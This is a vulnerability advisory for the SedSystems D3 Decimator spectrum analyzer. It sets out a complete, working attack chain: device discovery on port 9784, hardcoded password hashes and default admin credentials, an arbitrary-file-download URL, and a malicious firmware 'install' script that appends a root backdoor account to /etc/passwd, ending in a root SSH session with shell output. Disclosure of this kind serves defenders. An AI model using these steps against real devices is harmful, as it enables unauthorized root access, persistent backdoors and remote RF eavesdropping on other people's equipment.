SedSystems D3 Decimator - Multiple Vulnerabilities

SedSystems D3 Decimator Multiple Vulnerabilities
================================================
Identification of the vulnerable device can be performed by scanning for 
TCP port 9784 which offers a default remote API. When connected to this 
device it will announce itself with "connected" or similar:

Connected to x.x.x.x.
Escape character is '^]'.
connected
status
status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0
ping
ping:ok

The web service by default has a user interface for accessing the RF 
spectrum analyzer capability. The device itself from the API can give 
raw remote access to I/Q samples so can be used to remotely sniff the 
RF spectrum. The Web Configuration Manager can be found on 
"/cgi-bin/wcm.cgi". Multiple vulnerabilities exist.

Hardcoded credentials can be found in the /etc/passwd files contained 
within the default firmware since at least February 2013. The following 
entries can be found:

root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh
admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly

The admin user has a default password of "admin", at this time the root 
user password is unknown however there is no documented way of changing 
this trivially in a device. Using the "admin" user you can obtain a web 
session to the wcm.cgi and exploit a hidden arbitary file download 
vulnerability discovered by reverse engineering the firmware:

http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd

This will allow you to download any file and as the "admin" user has root
privileges you can obtain access to any file on the device. To execute 
arbitary code you can make use of a vulnerbaility within the firmware 
flash routines. By uploading a crafted tarball that contains a "install" 
script in its root, the device will accept your firmware and then attempt
to execute ./install if found as root, you can then cancel the "flash" 
process to prevent bricking/modifcation of the device. The problem is due
to /usr/bin/install_flash which after using "tar" to unpack an archive 
to a tmp folder of /tmp/PID_of_tar does the following:

    80  # If the archive contained its own install script then use that
    81  
    82  if [ -x ./install ]; then
    83      ./install $all_args
    84      rc=$?
    85      exit $rc
    86  fi
    87  

Using this vulnerability you can upload a .tar file containing an install
file that looks like the following to obtain a root user account with 
adm1n/admin.

cat install 
#!/bin/sh
echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd

You can then SSH remotely to the device as PermitRootLogin is enabled 
by default.

E.g.

$ ssh  -l adm1n x.x.x.x
[email protected]'s password: admin 
# uname -a
Linux d3-decimator-540 2.6.34.10 #1 PREEMPT Wed Aug 8 10:04:25 CST 2012 armv5tejl GNU/Linux
# cat /proc/cpuinfo
Processor	: ARM926EJ-S rev 4 (v5l)
BogoMIPS	: 103.83
Features	: swp half thumb fastmult vfp edsp java 
CPU implementer	: 0x41
CPU architecture: 5TEJ
CPU variant	: 0x0
CPU part	: 0x926
CPU revision	: 4

Hardware	: SED 32XX Based CCA
Revision	: 0000
Serial		: 0000000000000000
# 

Vendor website can be found at the following url:
* http://www.sedsystems.ca/decimator_spectrum_analyzer

 -- prdelka